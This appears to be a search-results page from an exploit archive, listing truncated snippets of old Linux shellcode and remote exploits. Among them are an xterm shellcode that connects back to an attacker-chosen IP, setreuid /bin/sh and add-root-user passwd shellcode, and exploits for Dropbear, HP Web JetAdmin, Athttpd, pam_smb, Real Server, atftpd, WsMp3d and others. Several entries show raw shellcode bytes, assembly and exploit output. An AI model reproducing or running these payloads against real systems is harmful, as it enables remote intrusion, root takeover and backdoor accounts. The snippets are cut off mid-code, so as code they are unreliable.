95 matches found
linux/x86 xterm -ut -display [IP]:0 132 bytes
No description provided by source. / Linux/x86 execve of /usr/X11R6/bin/xterm -ut -display ip:0, exit 127.0.0.1 is an example, you must change it to a useful ip making a subrutine into the exploit? - you must not delete 'K' after ip:0 - / include stdio.h char shellcode =...
linux/x86 execve /bin/sh setreuid12,12 50 bytes
linux/x86 execve /bin/sh setreuid12,12 50 bytes. Shellcode exploit for linx86 platform / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12, 12; / include char c0de = / main: / / setregid12, 12; / "\x29\xc0" / subl %eax, %eax / "\xb0\x47" / movb $71, %a...
linux/x86 add user 104 bytes
No description provided by source. / Source to this is pass.s This will append a root line to the passwd file see the source. Shok Matt Conover, [email protected] / char shellcode= "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb"...
Dropbear SSH 0.34 - Remote Code Execution
/ Linux x86 Dropbear SSH quit Connection closed. % objdump -R /usr/local/sbin/dropbear| grep malloc 080673bc R386JUMPSLOT malloc % drop-root -v24 localhost ?.2022u%24$hn@localhost's password: Connection closed by 127.0.0.1 % telnet localhost 10275 Trying 127.0.0.1... Connected to localhost. Escap...
Unreal Tournament 2004 ""Secure"" Overflow
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...
HP Web JetAdmin 6.5 - connectedNodes.ovpl Remote Code Execution
HP Web JetAdmin 6.5 - connectedNodes.ovpl Remote Code Execution !/usr/bin/perl use IO::Socket; This is an exploit for HP Web JetAdmin, the printer management server from HP. It is NOT about printers! The service usually runs on port 8000 on Windows, Solaris or Linux boxes. Greetz: The Phenoelit...
CVE-2004-0186
smbmnt in Samba 2.x and 3.x on Linux 2.6, when installed setuid, allows local users to gain root privileges by mounting a Samba share that contains a setuid root program, whose setuid attributes are not cleared when the share is mounted...
Athttpd 0.4b - GET Remote Buffer Overrun
// source: https://www.securityfocus.com/bid/8709/info Athttpd is said to be prone to a remote buffer overrun that could allow an attacker to execute arbitrary code. The problem occurs due to insufficient bounds checking when handling GET requests. As a result, an attacker may be capable of...
Athttpd 0.4b - GET Remote Buffer Overrun
Athttpd 0.4b - GET Remote Buffer Overrun // source: https://www.securityfocus.com/bid/8709/info Athttpd is said to be prone to a remote buffer overrun that could allow an attacker to execute arbitrary code. The problem occurs due to insufficient bounds checking when handling GET requests. As a...
Linux pam_lib_smb 1.1.6 - binlogin Remote Overflow
Linux pamlibsmb 1.1.6 - binlogin Remote Overflow / Linux pamlibsmb include include include include include include include include include / first negotiate / / packet capture by ethereal / char packet1 = 0xff, 0xfd, 0x03, 0xff, 0xfb, 0x18, 0xff, 0xfb, 0x1f, 0xff, 0xfb, 0x20, 0xff, 0xfb, 0x21,...
Linux pam_lib_smb < 1.1.6 /bin/login Remote Exploit
No description provided by source. / Linux pamlibsmb 1.1.6 /bin/login exploit by vertex Tested on Redhat 8.0, 9.0 Advisory at http://us2.samba.org/samba/ftp/pamsmb/ code based on : UClogin.c SunOS 5.6,5.7,5.8 remote /bin/login root exploit mikecc/unixclan...
Real Server 789 (Windows Linux) - Remote Code Execution
Real Server 789 Windows Linux - Remote Code Execution / / THCREALbad 0.4 - Wind0wZ & Linux remote root exploit / Exploit by: Johnny Cyberpunk thehackerschoice / THC PUBLIC SOURCE MATERIALS / / http://www.service.real.com/help/faq/security/rootexploit082203.html / / After successful exploitation o...
Real Server 7/8/9 (Windows / Linux) - Remote Code Execution
/ / THCREALbad 0.4 - Wind0wZ & Linux remote root exploit / Exploit by: Johnny Cyberpunk thehackerschoice / THC PUBLIC SOURCE MATERIALS / / http://www.service.real.com/help/faq/security/rootexploit082203.html / / After successful exploitation of a Linux box just type in the following / ps -ef | gr...
miniSQL (mSQL) 1.3 - GID Remote Code Execution
/ /.------ /.------..---- / / \ /\ . // / . /\ / | / .\ . \ / / / \ | / | | slc | - -------||--.---.//-| //-.|----.|| / \ / / mSQL / required by fatal / include include / required by fatal / include include include include include include include include include include include / required by...
Atftpd 0.6 - 'atftpdx.c' Remote Command Execution
/ PoC linux/86 remote exploit against atftpd c gunzip FIXED / include include include include include include include include include include define HEAPSTART 0x080514b4 define HEAPEND 0x080594b4 define BACKDOOR "rfe" / port MUST be 1024 / define NOPNUM 128 / number of nops / define PORT 69 / tft...
Atftpd 0.6 - atftpdx.c Remote Command Execution
Atftpd 0.6 - atftpdx.c Remote Command Execution / PoC linux/86 remote exploit against atftpd c gunzip FIXED / include include include include include include include include include include define HEAPSTART 0x080514b4 define HEAPEND 0x080594b4 define BACKDOOR "rfe" / port MUST be 1024 / define...
WsMp3d 0.x Remote Root Heap Overflow Exploit
Exploit for linux platform in category remote exploits ============================================ WsMp3d 0.x Remote Root Heap Overflow Exploit ============================================ / Title: Remote Heap Corruption Overflow vulnerability in WsMp3d + Exploit: 0x82-Remote.WsMp3d.again.c bash...
PoPToP PPTP server remotely exploitable buffer overflow
Versions older than 1.1.4-b3 and 1.1.3-20030409 affected. This seems to be exploitable only with Linux. PPTP? ----- PPTP-over-IPSEC is commonly used to create VPNs. Windows plays quite nicely with it. problem ------- PPTP packet header contain 16bit length which specifies the full size of the...
Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow
Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow / source: https://www.securityfocus.com/bid/4413/info Oracle 8i is a powerful relational database product. It is available for Windows, Linux, and a wide range of Unix operating systems. A vulnerability has been reported with some...
CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (4)
source: https://www.securityfocus.com/bid/3865/info CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller. When CDRDAO saves it's configuration to the .cdrdao file in a user's home directory,...